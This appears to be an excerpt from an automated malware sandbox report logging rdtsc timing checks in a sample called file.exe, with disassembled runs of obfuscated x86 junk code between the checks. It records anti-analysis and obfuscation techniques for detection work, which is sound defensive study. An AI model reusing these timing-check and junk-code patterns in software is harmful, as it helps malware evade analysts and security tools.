Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 361594 second address: 361598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3618E5 second address: 361910 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F27492B5218h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jns 00007F27492B5206h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 361910 second address: 361915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 361A1D second address: 19C92E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27492B520Fh 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D1B8Dh], ebx 0x00000013 push dword ptr [ebp+122D0349h] 0x00000019 mov dword ptr [ebp+122D2F70h], esi 0x0000001f call dword ptr [ebp+122D331Ch] 0x00000025 pushad 0x00000026 pushad 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a pop edx 0x0000002b jmp 00007F27492B5218h 0x00000030 popad 0x00000031 xor eax, eax 0x00000033 js 00007F27492B520Ch 0x00000039 mov dword ptr [ebp+122D2CD1h], edi 0x0000003f mov edx, dword ptr [esp+28h] 0x00000043 mov dword ptr [ebp+122D2CD1h], edi 0x00000049 mov dword ptr [ebp+122D374Bh], eax 0x0000004f jng 00007F27492B5212h 0x00000055 mov esi, 0000003Ch 0x0000005a xor dword ptr [ebp+122D1A94h], ecx 0x00000060 add esi, dword ptr [esp+24h] 0x00000064 sub dword ptr [ebp+122D1A94h], ecx 0x0000006a lodsw 0x0000006c sub dword ptr [ebp+122D1A94h], ebx 0x00000072 jnp 00007F27492B521Bh 0x00000078 jg 00007F27492B5215h 0x0000007e jmp 00007F27492B520Fh 0x00000083 add eax, dword ptr [esp+24h] 0x00000087 jmp 00007F27492B5211h 0x0000008c mov ebx, dword ptr [esp+24h] 0x00000090 mov dword ptr [ebp+122D1C09h], edx 0x00000096 add dword ptr [ebp+122D1B9Bh], ecx 0x0000009c push eax 0x0000009d push ebx 0x0000009e jp 00007F27492B520Ch 0x000000a4 push eax 0x000000a5 push edx 0x000000a6 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 361AA8 second address: 361AAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 361AAD second address: 361AD8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F27492B5218h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 361AD8 second address: 361AE2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2749204C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 361C6B second address: 361C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 361C72 second address: 361CBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2749204C32h 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp], esi 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F2749204C28h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 push eax 0x00000029 pushad 0x0000002a jne 00007F2749204C2Ch 0x00000030 push eax 0x00000031 push edx 0x00000032 jnp 00007F2749204C26h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 361DA9 second address: 361DAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 361DAF second address: 361E11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2749204C2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jp 00007F2749204C3Bh 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 push ecx 0x00000019 jmp 00007F2749204C39h 0x0000001e pop ecx 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F2749204C2Ch 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 361FED second address: 361FF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 361FF1 second address: 361FF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 361FF7 second address: 361FFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 361FFD second address: 362001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36245F second address: 362469 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F27492B5206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3627A3 second address: 36280D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2749204C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jnp 00007F2749204C28h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push edx 0x00000018 pop edx 0x00000019 popad 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f jmp 00007F2749204C37h 0x00000024 mov eax, dword ptr [eax] 0x00000026 pushad 0x00000027 jmp 00007F2749204C33h 0x0000002c jmp 00007F2749204C34h 0x00000031 popad 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 push ecx 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36280D second address: 362811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36285A second address: 36287B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2749204C38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3961FA second address: 396204 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F27492B5206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39672F second address: 396741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2749204C2Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 396741 second address: 39674B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F27492B5206h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 396894 second address: 3968AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2749204C33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3968AB second address: 3968C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F27492B5212h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3968C3 second address: 3968CE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31B12C second address: 31B131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31B131 second address: 31B18C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2749204C39h 0x00000007 jmp 00007F2749204C35h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jl 00007F2749204C50h 0x00000014 pushad 0x00000015 jnl 00007F2749204C26h 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007F2749204C36h 0x00000022 popad 0x00000023 push edi 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A1A39 second address: 3A1A4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27492B520Eh 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A1A4E second address: 3A1A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b jns 00007F2749204C26h 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A1A64 second address: 3A1A68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A1A68 second address: 3A1A6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A1CF1 second address: 3A1CF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A1CF5 second address: 3A1D13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2749204C34h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A1D13 second address: 3A1D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A1D17 second address: 3A1D29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2749204C2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A1D29 second address: 3A1D2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A1D2F second address: 3A1D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F2749204C26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A1D39 second address: 3A1D59 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F27492B520Ah 0x0000000f jmp 00007F27492B520Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A2322 second address: 3A233F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2749204C34h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A249C second address: 3A24A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A24A0 second address: 3A24B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F2749204C26h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A24B1 second address: 3A24B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A24B5 second address: 3A24BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A5641 second address: 3A5654 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F27492B5208h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A5654 second address: 3A5658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A5915 second address: 3A5919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A5919 second address: 3A591D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A591D second address: 3A5935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jnp 00007F27492B520Ch 0x0000000d push ecx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A7E0D second address: 3A7E15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A7E15 second address: 3A7E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F27492B5206h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F27492B5217h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A7E39 second address: 3A7E4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2749204C2Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A79D8 second address: 3A79DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A79DE second address: 3A79E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A9555 second address: 3A9575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007F27492B5217h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A9575 second address: 3A9579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A9579 second address: 3A9584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A9584 second address: 3A95C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2749204C37h 0x00000009 jng 00007F2749204C26h 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F2749204C35h 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3ADB27 second address: 3ADB61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27492B5218h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F27492B5216h 0x00000012 popad 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3ADB61 second address: 3ADB67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3ADCD9 second address: 3ADCE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B0C29 second address: 3B0C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B0C2D second address: 3B0C31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B0DBD second address: 3B0DCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jp 00007F2749204C26h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B111E second address: 3B1124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B1124 second address: 3B1128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B1128 second address: 3B1148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F27492B5216h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B6F37 second address: 3B6F3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B6F3B second address: 3B6F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F27492B5206h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B6F47 second address: 3B6F4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B6F4D second address: 3B6F5F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F27492B5208h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B584C second address: 3B587D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2749204C39h 0x00000007 jnc 00007F2749204C26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F2749204C26h 0x00000017 jnp 00007F2749204C26h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B587D second address: 3B5892 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27492B5211h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B5BB0 second address: 3B5BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2749204C30h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B5BC4 second address: 3B5BD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27492B520Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B5FAC second address: 3B5FBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 jg 00007F2749204C26h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 362283 second address: 36231E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F27492B520Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F27492B5208h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 movsx edx, di 0x0000002a xor dword ptr [ebp+122D2DD3h], edi 0x00000030 mov ebx, dword ptr [ebp+124981A6h] 0x00000036 push 00000000h 0x00000038 push edi 0x00000039 call 00007F27492B5208h 0x0000003e pop edi 0x0000003f mov dword ptr [esp+04h], edi 0x00000043 add dword ptr [esp+04h], 00000018h 0x0000004b inc edi 0x0000004c push edi 0x0000004d ret 0x0000004e pop edi 0x0000004f ret 0x00000050 mov dx, D8E6h 0x00000054 add eax, ebx 0x00000056 push 00000000h 0x00000058 push esi 0x00000059 call 00007F27492B5208h 0x0000005e pop esi 0x0000005f mov dword ptr [esp+04h], esi 0x00000063 add dword ptr [esp+04h], 00000016h 0x0000006b inc esi 0x0000006c push esi 0x0000006d ret 0x0000006e pop esi 0x0000006f ret 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 push ecx 0x00000074 jmp 00007F27492B520Eh 0x00000079 pop ecx 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36231E second address: 362323 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B60FF second address: 3B612F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27492B5210h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007F27492B5214h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B626A second address: 3B6284 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2749204C3Ch 0x00000008 jmp 00007F2749204C30h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B6284 second address: 3B62AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F27492B5210h 0x0000000f jmp 00007F27492B520Bh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B62AB second address: 3B62BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2749204C2Dh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B62BF second address: 3B62C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B62C3 second address: 3B62C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B6C9C second address: 3B6CB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27492B520Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BF147 second address: 3BF14E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BF14E second address: 3BF157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BF157 second address: 3BF15B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BF15B second address: 3BF15F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BD62C second address: 3BD638 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2749204C2Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BE123 second address: 3BE12B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
